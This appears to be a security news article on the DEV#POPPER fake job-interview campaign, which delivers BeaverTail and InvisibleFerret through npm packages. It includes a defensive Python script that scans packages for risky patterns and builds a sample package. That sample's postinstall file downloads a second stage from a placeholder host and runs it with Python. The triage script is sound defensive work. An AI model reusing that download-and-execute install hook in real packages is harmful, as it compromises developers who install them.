An ongoing social engineering campaign is targeting software developers with bogus npm packages under the guise of a job interview to trick them into downloading a Python backdoor.
Cybersecurity firm Securonix is tracking the activity under the name DEV#POPPER, linking it to North Korean threat actors.
“During these fraudulent interviews, the developers are often asked to perform tasks that involve downloading and running software from sources that appear legitimate, such as GitHub,” security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said. “The software contained a malicious Node JS payload that, once executed, compromised the developer’s system.”
Details of the campaign first emerged in late November 2023, when Palo Alto Networks Unit 42 detailed an activity cluster dubbed Contagious Interview, in which the threat actors pose as employers to lure software developers into installing malware such as BeaverTail and InvisibleFerret through the interview process.
Then, earlier this February, software supply chain security firm Phylum uncovered a set of malicious packages on the npm registry that delivered the same malware families to siphon sensitive information from compromised developer systems.
It is worth noting that Contagious Interview is said to be distinct from Operation Dream Job (aka DeathNote or NukeSped), with Unit 42 telling The Hacker News that the former is “focused on targeting developers, mainly through fake identities in freelance job portals, and the next stages involve the use of developer tools and npm packages leading to […] BeaverTail and InvisibleFerret.”
Operation Dream Job, linked to the prolific Lazarus Group from North Korea, is a long-running offensive campaign that sends unsuspecting professionals employed in various sectors, such as aerospace, cryptocurrency, and defense, malicious files dressed up as job offers in order to distribute malware.
First uncovered by Israeli cybersecurity firm ClearSky at the start of 2020, it also exhibits overlaps with two other Lazarus clusters known as Operation In(ter)ception and Operation North Star.
The attack chain detailed by Securonix begins with a ZIP archive hosted on GitHub that is likely sent to the target as part of the interview. Inside the archive is a seemingly innocuous npm module that harbors a malicious JavaScript file codenamed BeaverTail, which acts as an information stealer and as a loader for a Python backdoor called InvisibleFerret that is retrieved from a remote server.
Besides gathering system information, the implant is capable of command execution, file enumeration and exfiltration, and clipboard and keystroke logging.
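As an added defensive example (not code from Securonix or this article), the script below is a pre-run triage check a developer can point at an npm module received as an "interview task" before installing it: it lists lifecycle scripts that npm would execute automatically and flags JavaScript that spawns processes, opens network connections or launches a Python interpreter, the traits the article attributes to the loader stage. The sample package it writes to a temp directory is constructed for the demonstration, with placeholder contents that are never executed.

```python
import json, re, tempfile
from pathlib import Path

# Regex over file content -> reason shown to the reviewer. These correspond to the loader
# behaviour described above: spawning processes, fetching a second stage, handing off to Python.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"require\(['\"]child_process['\"]\)"), "spawns external processes"),
    (re.compile(r"\b(?:eval|new Function)\s*\("), "evaluates dynamically built code"),
    (re.compile(r"require\(['\"]https?['\"]\)"), "opens network connections"),
    (re.compile(r"\b(?:execSync|spawn|exec)\s*\(\s*['\"]python"), "launches a Python interpreter"),
]
# npm runs these scripts automatically during `npm install`, before anyone reads the code.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

def triage_package(pkg_dir):
    """Return (relative file, reason) findings for the npm package at pkg_dir."""
    pkg_dir = Path(pkg_dir)
    findings = []
    manifest = json.loads((pkg_dir / "package.json").read_text())
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings.append(("package.json", f"runs '{cmd}' automatically via {hook}"))
    for js in sorted(pkg_dir.rglob("*.js")):
        text = js.read_text(errors="replace")
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if pattern.search(text):
                findings.append((js.relative_to(pkg_dir).as_posix(), reason))
    return findings

def build_sample_package():
    """Write a constructed sample package to a temp dir; nothing in it is executed."""
    root = Path(tempfile.mkdtemp())
    (root / "package.json").write_text(json.dumps({
        "name": "interview-task", "version": "1.0.0",
        "scripts": {"postinstall": "node lib/setup.js", "test": "jest"},
    }))
    (root / "index.js").write_text("module.exports = (a, b) => a + b;\n")
    (root / "lib").mkdir()
    (root / "lib" / "setup.js").write_text(
        "const cp = require('child_process');\n"
        "const https = require('https');\n"
        "// constructed stand-in; the URL is a placeholder, not a real host\n"
        "https.get('https://example.invalid/stage2', () => {});\n"
        "cp.execSync('python stage2.py');\n"
    )
    return root

if __name__ == "__main__":
    for path, reason in triage_package(build_sample_package()):
        print(f"{path}: {reason}")
```

A clean result is not proof of safety (obfuscated or dynamically assembled code will slip past string patterns), but any finding here is reason to run the task only in a disposable VM, if at all.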
The development is a sign that North Korean threat actors continue to hone a raft of weapons for their cyber attack arsenal, constantly updating their tradecraft with improved abilities to hide their actions and blend in on host systems and networks, not to mention siphon off data and turn compromises into financial gain.
“When it comes to attacks which originate through social engineering, it’s critical to maintain a security-focused mindset, especially during intense and stressful situations like job interviews,” Securonix researchers said.
“The attackers behind the DEV#POPPER campaigns abuse this, knowing that the person on the other end is in a highly distracted and much more vulnerable state.”